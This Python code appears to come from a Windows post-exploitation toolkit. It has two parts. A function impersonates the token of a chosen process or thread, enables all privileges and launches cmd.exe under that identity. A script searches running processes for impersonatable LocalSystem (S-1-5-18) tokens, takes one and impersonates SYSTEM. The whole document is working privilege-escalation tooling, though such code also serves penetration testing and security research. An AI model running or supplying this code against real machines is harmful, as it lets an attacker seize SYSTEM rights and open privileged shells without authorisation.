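def imptoken(args):
    """Impersonate the token of a process (or one of its threads) and run cmd.exe under it.

    Args:
        args: mapping read for two keys -- ``'pid'`` (the target process id;
            must not be None) and ``'ihandle'`` (a thread handle; when it is
            not None the token of that thread is impersonated instead of the
            process's primary token).

    Returns:
        None. Outcomes are reported via ``printT`` and ``logging.error``;
        nothing is raised for a missing pid or a failed impersonation.

    Side effects: calls ``Impersonate.enableAllUserRights`` and
    ``impersonateThisToken``, which change the calling thread's security
    context, and on success ``executeCMDWithThreadEffectiveToken``. This
    function never calls ``terminateImpersonation``, so the caller is
    responsible for reverting the thread's token afterwards.
    """
    pid = args['pid']
    # Guard clause: nothing can be done without a target process.
    if pid is None:
        logging.error("A pid has to be selected")
        return

    ihandle = args['ihandle']
    if ihandle is None:
        printT("Impersonating primary token of pid {0}".format(pid))
    else:
        printT("Impersonating token of the thread ihandle {0} of pid {1}".
               format(ihandle, pid))

    imp = Impersonate()
    imp.enableAllUserRights()
    status = imp.impersonateThisToken(pid=pid, iHandle=ihandle)
    # Truthiness instead of `== True`: any truthy status counts as success.
    if not status:
        logging.error("Impossible to impersonate")
        return

    printT("Trying to open a cmd shell...")
    printT(
        "NOTICE: If not enough privileges for targeted pid, you can't open a cmd.exe shell"
    )
    imp.printCurrentThreadEffectiveToken()
    # enableAllUserRights() is invoked a second time after impersonation;
    # presumably it now acts on the impersonated thread token rather than
    # the process token -- confirm in Impersonate before treating this as
    # a duplicate call.
    imp.enableAllUserRights()
    imp.executeCMDWithThreadEffectiveToken()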
import sys
sys.path.append('../')
from impersonate import Impersonate
from utils import *
from windef import TokenImpersonation

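configureLogging()
imp = Impersonate()
# Get all 'impersonation' tokens which can be impersonated and whose SID is
# 'system' (S-1-5-18 is the well-known LocalSystem SID).
allTokens = imp.getTokensAccessibleFilter(targetPID=None,
                                          filter={
                                              'canimpersonate': True,
                                              'sid': 'S-1-5-18',
                                              'type': TokenImpersonation
                                          },
                                          _useThreadMethod=False)
# `not allTokens` covers both results the original compared against
# explicitly (an empty dict and None).
if not allTokens:
    print("No one token found for impersonation")
else:
    # use the first token of the first pid returned in 'allTokens'
    pid = next(iter(allTokens))
    firstIHandle = allTokens[pid][0]['ihandle']
    imp.printThisToken(allTokens, pid, firstIHandle)
    imp.impersonateThisToken(pid=pid, iHandle=firstIHandle)
    try:
        print("Current Effective token for current thread after impersonation:")
        imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False)
    finally:
        # Always revert the thread to its own token, even if printing the
        # effective token raises, so the script never continues or exits
        # while still impersonating.
        imp.terminateImpersonation()
    print(
        "Current Effective token for current thread (impersonation finished):")
    imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False)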